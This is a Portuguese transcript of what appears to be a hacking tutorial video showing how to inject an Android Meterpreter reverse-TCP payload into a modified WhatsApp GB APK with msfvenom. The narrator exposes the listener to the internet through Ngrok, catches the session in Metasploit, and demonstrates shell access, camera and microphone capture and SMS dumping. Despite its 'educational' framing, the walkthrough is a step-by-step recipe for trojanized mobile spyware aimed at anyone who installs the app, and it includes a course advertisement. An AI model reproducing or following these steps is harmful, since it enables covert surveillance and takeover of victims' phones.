Imagina só, você instala um aplicativo que parece inofensivo no seu smartphone Android e de repente um hacker consegue acessar sua câmera, seu microfone, suas mensagens, enfim, ele tem total controle do seu dispositivo. Neste vídeo eu vou te mostrar na prática como tudo isso acontece, desde a criação de aplicativo malicioso até a invasão completa de um dispositivo. Mas atenção, isso aqui é somente para fins educacionais. Eu vou simular uma invasão no meu próprio smartphone, então não estou cometendo nenhum crime. Beleza, já estou aqui no meu Kali Linux, só que antes da gente criar o nosso APK malicioso, a gente precisa instalar algumas dependências, porque o objetivo aqui não é criar um malware isolado, a gente quer infectar um aplicativo original, funcional, com o nosso payload malicioso. Então por isso a gente vai precisar de um APK original, a gente vai modificar esse APK, assinar, alinhar, deixar tudo certinho ali para que ele passe despercebido no processo de instalação no Android. Então aqui eu vou dar um APT Update. Beleza, já atualizou aqui os repositórios, vou dar um APT Install. APK Tool, que é a primeira ferramenta que a gente vai precisar. O APK Tool serve para desmontar e montar um APK, ou seja, a gente vai pegar o APK original e transformar ele em código. A gente vai modificar esse código, injetando o nosso payload malicioso e depois montar ele de novo no aplicativo. Nós vamos instalar também o kit de desenvolvimento Java, para a gente conseguir assinar, montar o aplicativo ali certinho, que é o OpenJDK11, traço JDK e também a gente vai instalar o ZipAlign, que vai ser responsável por alinhar o aplicativo ali no final e ele instalar no smartphone sem nenhum problema. E beleza, agora com todas as dependências instaladas, a gente precisa do aplicativo original ali para a gente infectar. Então vou acessar o APK Pure, que é o site para fazer download de APK de aplicativos que você baixaria na loja. Vou acessar aqui pelo navegador, APK Pure, e beleza, aqui eu posso baixar qualquer APK de aplicativos que eu baixaria pela loja. Então eu vou escolher um APK que é original para eu infectar com o meu payload malicioso. E é muito comum esses ataques acontecerem com aplicativos modificados, como o WhatsApp GB, algum jogo modificado, algum cheat para um jogo, enfim. Então eu vou fazer isso com o WhatsApp GB. Vamos ver se encontra aqui o APK. Beleza, achei aqui o APK do WhatsApp GB, vou fazer o download. Embaixar o APK, aqui embaixo em baixar o APK, novamente, e ele já vai começar ali o download. Beleza, finalizou o download aqui do APK, então agora a gente pode utilizar o MSF Venom para criar o nosso malware. O MSF Venom é uma ferramenta que faz parte do Metasploit e ele permite com que a gente crie payloads maliciosos para diversos sistemas e arquiteturas. E no nosso caso aqui a gente vai criar um payload malicioso para um APK. Então vamos lá, MSF Venom, eu vou definir aqui o payload que eu vou utilizar, que é no caso Android barra Metaerpreter, que é um console bem mais interativo com várias funcionalidades já prontas aqui do Metasploit e Reverse TCP. Ou seja, eu vou forçar com que aquele dispositivo infectado se conecte no meu servidor via TCP, onde essa conexão vai me dar acesso total àquele sistema. Beleza, agora a gente precisa passar algumas variáveis aqui para o nosso payload. Wellhost, que é o endereço desse servidor ali, que vai ficar escutando, recebendo essas conexões de controle. E como eu quero que esse ataque seja possível de forma totalmente externa, de qualquer lugar do mundo, qualquer pessoa que abrir esse aplicativo, eu vou receber essa conexão aqui, eu vou utilizar o Ngrok para fazer um redirecionamento de portas e expor esse meu servidor local do Metasploit para a internet. Você pode criar uma conta no Ngrok, aqui Ngrok.com, e utilizar ali o seu token gratuito mesmo para fazer esse redirecionamento de portas. Eu vou já criar aqui, eu já estou com tudo configurado, você pode instalar o Ngrok com apt install Ngrok também. E para criar só Ngrok, o protocolo e a porta que você quer ali receber essas conexões. No caso, coloquei 7878, ele vai criar esse túnel, olha só, já criou um túnel aqui para mim, e esse aqui é o endereço público desse redirecionamento. Tudo que chegar nesse host, nessa porta, vai ser redirecionado aqui para o meu local host, na porta 7878. Então, eu vou utilizar aqui esse aqui como o endereço desse meu servidor, e o L port vai ser justamente a porta que ele gerou aqui para mim. Beleza? Show! Agora eu preciso passar para o MSF Venom o APK original, onde ele vai injetar esse payload malicioso, que provavelmente está aqui em downloads, gbwhatsapp, beleza? E agora, contra a sua, vou dizer, a saída desse novo APK modificado e malicioso, onde eu vou chamar de whatsapp, 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 underline, gb.apk. Vou colocar aqui na pasta de downloads também, vai ficar lá junto, e vou dar um enter. E olha só, ele já começou a criar o APK, já modificou ali, agora está recriando o APK com o payload metarpreter ali. E beleza, APK criado, e agora que a gente tem esse APK, a gente precisa configurar o listener do Metasploit para receber a conexão da vítima quando ela instalar esse aplicativo. Então, aqui no terminal, eu vou utilizar o MSF Console, vou dar um use multi barra handler, vou ter que definir aqui o payload que eu utilizei, que é o Android metarpreter reverse TCP, o Lhost, no caso, agora é o Lhost local, então vou colocar aqui 0.0.0.0, e o Lport 7.8.7.8, que foi onde eu defini ali no Ngrok, aonde que eu vou receber essas conexões ali que o Ngrok redirecionar aqui para o meu localhost. Vou dar um set aqui, beleza? Agora só dar um exploit, e ele já vai começar a esperar essas conexões. Está dando alguns erros aqui, mas provavelmente algum bot tentando se conectar nessa porta, eu poderia até alterar essa porta aqui, mas vamos tentar dessa forma aqui mesmo. A única coisa que falta é a gente enviar esse APK para a vítima, e nesse momento existem infinitas formas de persuadir a vítima e instalar esse APK malicioso. Inclusive, é muito comum que esses aplicativos modificados, ou cheat de jogo, aplicativos de cassino modificados, enfim, normalmente esses aplicativos têm um malware inserido ali dentro. E se você instalar, alguém vai tomar controle do seu dispositivo. Inclusive, se você quer se tornar um hacker de verdade, trabalhar invadindo sistemas de forma legal, seu primeiro passo é o treinamento Pentest Zero Profissional da Solid. Lá você vai aprender tudo do zero até se tornar um hacker certificado. O link está no comentário fixado. Inclusive, então eu vou fazer um servidorzinho web aqui só para eu conseguir fazer o download desse aplicativo na minha máquina. Eu já separei aqui um smartphone emulado, mas eu poderia utilizar um smartphone real para fazer esse ataque. Então, eu vou entrar aqui na pasta de downloads, vou abrir um servidorzinho com Python, tpserver da porta 8080, por exemplo, e vou acessar localmente aqui mesmo, deixa eu ver o meu IP. Vou acessar localmente aqui, beleza? Cessei aqui o link e vou baixar o WhatsApp GB.apk, que é o nosso aplicativo malicioso. Vou salvar ele aqui, manter e vou enviar ele aqui para o meu Android. E beleza, olha só, já está iniciando ali o aplicativo. Indo aqui para o meu Metasploit, olha só, a gente acabou de receber essa conexão. E aqui a gente consegue executar qualquer comando dentro desse Android. Eu posso dar um SISIFO aqui para extrair informações do Android. Eu posso utilizar o comando SHELL para ter uma SHELL dentro daquele dispositivo. Olha só, eu consigo executar comandos aqui. Se eu dar um EXIT aqui, eu volto para a minha SHELL do Matterpreter. E colocando um ponto de interrogação aqui, eu tenho uma lista de todos os comandos que eu posso executar. Então, eu poderia, por exemplo, gravar o microfone, tirar uma foto com as câmeras do smartphone, ou até ver em tempo real um vídeo da câmera, o que ela está gravando ali. Posso enviar áudios para o celular da vítima, fazer o dump de SMS, enfim, fazer o que eu quiser. Eu tenho o controle total desse dispositivo.